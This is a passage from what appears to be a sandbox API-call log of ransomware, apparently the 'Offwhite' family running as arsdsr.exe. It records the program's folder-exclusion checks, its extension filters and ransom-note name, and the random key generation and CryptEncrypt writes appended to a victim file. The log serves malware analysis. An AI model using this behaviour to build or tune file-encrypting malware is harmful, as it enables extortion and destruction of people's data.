lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Favorites\\*.*") returned="C:/Users\\All Users\\Favorites\\*.*" [0143.605] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Favorites\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="ARM", cAlternateFileName="")) returned 0xffffffff [0143.607] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0143.607] lstrcmpiW (lpString1="Microsoft", lpString2=".") returned 1 [0143.607] lstrcmpiW (lpString1="Microsoft", lpString2="..") returned 1 [0143.607] lstrcmpiW (lpString1="Microsoft", lpString2="...") returned 1 [0143.607] lstrcmpiW (lpString1="Microsoft", lpString2="windows") returned -1 [0143.607] lstrcmpiW (lpString1="Microsoft", lpString2="$recycle.bin") returned 1 [0143.607] lstrcmpiW (lpString1="Microsoft", lpString2="rsa") returned -1 [0143.608] lstrcmpiW (lpString1="Microsoft", lpString2="ntuser.dat") returned -1 [0143.608] lstrcmpiW (lpString1="Microsoft", lpString2="programdata") returned -1 [0143.608] lstrcmpiW (lpString1="Microsoft", lpString2="appdata") returned 1 [0143.608] lstrcmpiW (lpString1="Microsoft", lpString2="program files") returned -1 [0143.608] lstrcmpiW (lpString1="Microsoft", lpString2="program files (x86)") returned -1 [0143.608] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\All Users\\" | out: lpString1="C:/Users\\All Users\\") returned="C:/Users\\All Users\\" [0143.608] lstrcatW (in: lpString1="C:/Users\\All Users\\", lpString2="Microsoft" | out: lpString1="C:/Users\\All Users\\Microsoft") returned="C:/Users\\All Users\\Microsoft" [0143.608] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\") returned="C:/Users\\All Users\\Microsoft\\" [0143.608] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\All Users\\Microsoft\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\") returned="C:/Users\\All Users\\Microsoft\\" [0143.608] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\*.*") returned="C:/Users\\All Users\\Microsoft\\*.*" [0143.608] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0143.609] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0143.609] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0143.609] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0143.609] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0143.609] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x3fc949a4, ftLastAccessTime.dwHighDateTime=0x1ca0445, ftLastWriteTime.dwLowDateTime=0x3fc949a4, ftLastWriteTime.dwHighDateTime=0x1ca0445, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="Assistance", cAlternateFileName="ASSIST~1")) returned 1 [0143.609] lstrcmpiW (lpString1="Assistance", lpString2=".") returned 1 [0143.609] lstrcmpiW (lpString1="Assistance", lpString2="..") returned 1 [0143.609] lstrcmpiW (lpString1="Assistance", lpString2="...") returned 1 [0143.609] lstrcmpiW (lpString1="Assistance", lpString2="windows") returned -1 [0143.609] lstrcmpiW (lpString1="Assistance", lpString2="$recycle.bin") returned 1 [0143.609] lstrcmpiW (lpString1="Assistance", lpString2="rsa") returned -1 [0143.609] lstrcmpiW (lpString1="Assistance", lpString2="ntuser.dat") returned -1 [0143.609] lstrcmpiW (lpString1="Assistance", lpString2="programdata") returned -1 [0143.609] lstrcmpiW (lpString1="Assistance", lpString2="appdata") returned 1 [0143.609] lstrcmpiW (lpString1="Assistance", lpString2="program files") returned -1 [0143.609] lstrcmpiW (lpString1="Assistance", lpString2="program files (x86)") returned -1 [0143.609] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\") returned="C:/Users\\All Users\\Microsoft\\" [0143.609] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\", lpString2="Assistance" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance") returned="C:/Users\\All Users\\Microsoft\\Assistance" [0143.609] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Assistance", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\") returned="C:/Users\\All Users\\Microsoft\\Assistance\\" [0143.609] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Microsoft\\Assistance\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\") returned="C:/Users\\All Users\\Microsoft\\Assistance\\" [0143.609] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\*.*") returned="C:/Users\\All Users\\Microsoft\\Assistance\\*.*" [0143.609] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Assistance\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x3fc949a4, ftLastAccessTime.dwHighDateTime=0x1ca0445, ftLastWriteTime.dwLowDateTime=0x3fc949a4, ftLastWriteTime.dwHighDateTime=0x1ca0445, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0143.610] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0143.610] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x3fc949a4, ftLastAccessTime.dwHighDateTime=0x1ca0445, ftLastWriteTime.dwLowDateTime=0x3fc949a4, ftLastWriteTime.dwHighDateTime=0x1ca0445, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0143.610] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0143.610] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0143.610] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x3fc949a4, ftLastAccessTime.dwHighDateTime=0x1ca0445, ftLastWriteTime.dwLowDateTime=0x3fc949a4, ftLastWriteTime.dwHighDateTime=0x1ca0445, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="Client", cAlternateFileName="")) returned 1 [0143.610] lstrcmpiW (lpString1="Client", lpString2=".") returned 1 [0143.610] lstrcmpiW (lpString1="Client", lpString2="..") returned 1 [0143.610] lstrcmpiW (lpString1="Client", lpString2="...") returned 1 [0143.610] lstrcmpiW (lpString1="Client", lpString2="windows") returned -1 [0143.610] lstrcmpiW (lpString1="Client", lpString2="$recycle.bin") returned 1 [0143.610] lstrcmpiW (lpString1="Client", lpString2="rsa") returned -1 [0143.610] lstrcmpiW (lpString1="Client", lpString2="ntuser.dat") returned -1 [0143.610] lstrcmpiW (lpString1="Client", lpString2="programdata") returned -1 [0143.610] lstrcmpiW (lpString1="Client", lpString2="appdata") returned 1 [0143.610] lstrcmpiW (lpString1="Client", lpString2="program files") returned -1 [0143.610] lstrcmpiW (lpString1="Client", lpString2="program files (x86)") returned -1 [0143.610] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\Assistance\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\") returned="C:/Users\\All Users\\Microsoft\\Assistance\\" [0143.611] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\", lpString2="Client" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client" [0143.611] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\" [0143.611] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\" [0143.611] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\*.*") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\*.*" [0143.611] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x3fc949a4, ftLastAccessTime.dwHighDateTime=0x1ca0445, ftLastWriteTime.dwLowDateTime=0x3fc949a4, ftLastWriteTime.dwHighDateTime=0x1ca0445, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x580056, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0143.611] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0143.611] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x3fc949a4, ftLastAccessTime.dwHighDateTime=0x1ca0445, ftLastWriteTime.dwLowDateTime=0x3fc949a4, ftLastWriteTime.dwHighDateTime=0x1ca0445, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x580056, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0143.611] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0143.611] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0143.611] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0xa8f17049, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x243448f1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x580056, dwReserved1=0x295e370, cFileName="1.0", cAlternateFileName="")) returned 1 [0143.611] lstrcmpiW (lpString1="1.0", lpString2=".") returned 1 [0143.611] lstrcmpiW (lpString1="1.0", lpString2="..") returned 1 [0143.611] lstrcmpiW (lpString1="1.0", lpString2="...") returned 1 [0143.611] lstrcmpiW (lpString1="1.0", lpString2="windows") returned -1 [0143.611] lstrcmpiW (lpString1="1.0", lpString2="$recycle.bin") returned 1 [0143.611] lstrcmpiW (lpString1="1.0", lpString2="rsa") returned -1 [0143.611] lstrcmpiW (lpString1="1.0", lpString2="ntuser.dat") returned -1 [0143.612] lstrcmpiW (lpString1="1.0", lpString2="programdata") returned -1 [0143.612] lstrcmpiW (lpString1="1.0", lpString2="appdata") returned -1 [0143.612] lstrcmpiW (lpString1="1.0", lpString2="program files") returned -1 [0143.612] lstrcmpiW (lpString1="1.0", lpString2="program files (x86)") returned -1 [0143.612] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\" [0143.612] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\", lpString2="1.0" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0" [0143.612] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\" [0143.612] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\" [0143.612] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\*.*") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\*.*" [0143.612] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0xa8f17049, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x243448f1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName=".", cAlternateFileName="")) returned 0x544750 [0143.612] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0143.612] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0xa8f17049, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x243448f1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 1 [0143.612] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0143.612] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0143.612] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x243448f1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae0e8854, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae0e8854, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="en-US", cAlternateFileName="")) returned 1 [0143.612] lstrcmpiW (lpString1="en-US", lpString2=".") returned 1 [0143.613] lstrcmpiW (lpString1="en-US", lpString2="..") returned 1 [0143.613] lstrcmpiW (lpString1="en-US", lpString2="...") returned 1 [0143.613] lstrcmpiW (lpString1="en-US", lpString2="windows") returned -1 [0143.613] lstrcmpiW (lpString1="en-US", lpString2="$recycle.bin") returned 1 [0143.613] lstrcmpiW (lpString1="en-US", lpString2="rsa") returned -1 [0143.613] lstrcmpiW (lpString1="en-US", lpString2="ntuser.dat") returned -1 [0143.613] lstrcmpiW (lpString1="en-US", lpString2="programdata") returned -1 [0143.613] lstrcmpiW (lpString1="en-US", lpString2="appdata") returned 1 [0143.613] lstrcmpiW (lpString1="en-US", lpString2="program files") returned -1 [0143.613] lstrcmpiW (lpString1="en-US", lpString2="program files (x86)") returned -1 [0143.613] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\" [0143.613] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\", lpString2="en-US" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US" [0143.613] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\" [0143.613] lstrcpyW (in: lpString1=0x295cff0, lpString2="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\" [0143.613] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*.*") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*.*" [0143.613] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*.*", lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x243448f1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae0e8854, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae0e8854, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6e006c, dwReserved1=0x295d670, cFileName=".", cAlternateFileName="")) returned 0x544790 [0143.618] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0143.618] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x243448f1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae0e8854, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae0e8854, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6e006c, dwReserved1=0x295d670, cFileName="..", cAlternateFileName="")) returned 1 [0143.619] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0143.619] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0143.619] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x2436abaa, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xabde2c6f, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa65a8bbf, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x2f22, dwReserved0=0x6e006c, dwReserved1=0x295d670, cFileName="Help_CValidator.H1D", cAlternateFileName="HELP_C~1.H1D")) returned 1 [0143.619] lstrcmpiW (lpString1="Help_CValidator.H1D", lpString2=".") returned 1 [0143.619] lstrcmpiW (lpString1="Help_CValidator.H1D", lpString2="..") returned 1 [0143.619] lstrcmpiW (lpString1="Help_CValidator.H1D", lpString2="...") returned 1 [0143.619] lstrcmpiW (lpString1="Help_CValidator.H1D", lpString2="windows") returned -1 [0143.619] lstrcmpiW (lpString1="Help_CValidator.H1D", lpString2="$recycle.bin") returned 1 [0143.619] lstrcmpiW (lpString1="Help_CValidator.H1D", lpString2="rsa") returned -1 [0143.619] lstrcmpiW (lpString1="Help_CValidator.H1D", lpString2="ntuser.dat") returned -1 [0143.619] lstrcmpiW (lpString1="Help_CValidator.H1D", lpString2="programdata") returned -1 [0143.619] lstrcmpiW (lpString1="Help_CValidator.H1D", lpString2="appdata") returned 1 [0143.619] lstrcmpiW (lpString1="Help_CValidator.H1D", lpString2="program files") returned -1 [0143.619] lstrcmpiW (lpString1="Help_CValidator.H1D", lpString2="program files (x86)") returned -1 [0143.619] lstrcpyW (in: lpString1=0x295cde8, lpString2="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\" [0143.619] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\", lpString2="Help_CValidator.H1D" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D" [0143.620] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0143.620] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0143.620] PathFindExtensionW (pszPath="Help_CValidator.H1D") returned=".H1D" [0143.620] lstrcmpiW (lpString1=".H1D", lpString2=".exe") returned 1 [0143.620] lstrcmpiW (lpString1=".H1D", lpString2=".log") returned -1 [0143.620] lstrcmpiW (lpString1=".H1D", lpString2=".cab") returned 1 [0143.620] lstrcmpiW (lpString1=".H1D", lpString2=".cmd") returned 1 [0143.620] lstrcmpiW (lpString1=".H1D", lpString2=".com") returned 1 [0143.620] lstrcmpiW (lpString1=".H1D", lpString2=".cpl") returned 1 [0143.620] lstrcmpiW (lpString1=".H1D", lpString2=".ini") returned -1 [0143.620] lstrcmpiW (lpString1=".H1D", lpString2=".dll") returned 1 [0143.620] lstrcmpiW (lpString1=".H1D", lpString2=".url") returned -1 [0143.620] lstrcmpiW (lpString1=".H1D", lpString2=".ttf") returned -1 [0143.620] lstrcmpiW (lpString1=".H1D", lpString2=".mp3") returned -1 [0143.620] lstrcmpiW (lpString1=".H1D", lpString2=".pif") returned -1 [0143.620] lstrcmpiW (lpString1=".H1D", lpString2=".mp4") returned -1 [0143.620] lstrcmpiW (lpString1=".H1D", lpString2=".OFFWHITE") returned -1 [0143.620] lstrcmpiW (lpString1=".H1D", lpString2=".msi") returned -1 [0143.620] lstrcmpiW (lpString1="Help_CValidator.H1D", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0143.620] GetProcessHeap () returned 0x500000 [0143.620] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x522210 [0143.620] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_cvalidator.h1d"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0143.626] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x295cb60 | out: lpFileSize=0x295cb60*=12066) returned 1 [0143.626] GetProcessHeap () returned 0x500000 [0143.627] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0143.627] GetProcessHeap () returned 0x500000 [0143.627] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0143.627] GetProcessHeap () returned 0x500000 [0143.627] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0143.627] GetProcessHeap () returned 0x500000 [0143.627] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0143.627] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0143.627] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0143.627] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0143.627] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0143.627] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0143.627] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0143.627] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0143.627] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0143.627] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295c910*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295c910*=0x100) returned 1 [0143.627] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0143.628] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0143.628] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295c90c*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295c90c*=0x100) returned 1 [0143.628] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x2f22, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.628] SetLastError (dwErrCode=0x0) [0143.628] WriteFile (in: hFile=0x1e4, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0143.646] GetLastError () returned 0x0 [0143.646] GetLastError () returned 0x0 [0143.646] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x3022, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.646] WriteFile (in: hFile=0x1e4, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, 